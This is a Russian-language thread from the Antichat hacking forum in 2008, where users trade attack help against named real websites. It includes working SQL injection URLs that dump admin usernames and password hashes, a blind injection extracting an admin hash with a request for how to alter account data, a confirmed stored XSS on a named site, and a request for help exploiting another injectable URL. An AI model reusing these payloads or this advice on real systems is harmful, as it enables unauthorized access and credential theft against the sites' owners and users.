ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.08.2008, 21:13
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
0_о
Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц -
Код:
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
И вот тебе бонус -
Код:
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
Читай маны, а то после еще одного такого поста у мну инфаркт случится
Последний раз редактировалось 0nep@t0p; 17.08.2008 в 21:26..
|
|
|

17.08.2008, 21:33
|
|
Новичок
Регистрация: 16.08.2008
Сообщений: 2
Провел на форуме: 3851
Репутация:
0
|
|
http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELE CT+concat(username,0x3a,password)+from+account+lim it+0,1),1,1))>51
Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше)
Вопрос:
Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?
Последний раз редактировалось extrem0; 17.08.2008 в 21:35..
|
|
|

17.08.2008, 21:38
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
|
|
|

17.08.2008, 21:52
|
|
Новичок
Регистрация: 16.08.2008
Сообщений: 2
Провел на форуме: 3851
Репутация:
0
|
|
Сообщение от 0nep@t0p
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Понятно... А существует ли иной способ модификации инфы(через php например) ?
|
|
|

18.08.2008, 02:43
|
|
Новичок
Регистрация: 18.07.2008
Сообщений: 12
Провел на форуме: 99313
Репутация:
3
|
|
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?
Вот ссылка http://gayby.org/news/comments/192.html
|
|
|

18.08.2008, 06:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
Это майскуль, разделение запросов в ней отсутствует
А точка с запятой?
|
|
|

18.08.2008, 07:03
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Сообщение от Cry Wolf
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?
Вот ссылка http://gayby.org/news/comments/192.html
Да, там кстати кавычки фильтруются.
Сообщение от krypt3r
А точка с запятой?
Нет, не путай MySQL5 и MSSQL
Последний раз редактировалось Ded MustD!e; 18.08.2008 в 07:11..
|
|
|

18.08.2008, 09:56
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме: 3009843
Репутация:
204
|
|
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
Код:
http://www.savchenko.ru/developments/84.html
|
|
|

18.08.2008, 10:01
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Сообщение от Shaitan-Devil
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
Код:
http://www.savchenko.ru/developments/84.html
Невижу вопроса. /85-1.html уязвимость есть.
|
|
|

18.08.2008, 10:12
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме: 3009843
Репутация:
204
|
|
Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?
|
|
|
|
 |
|
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|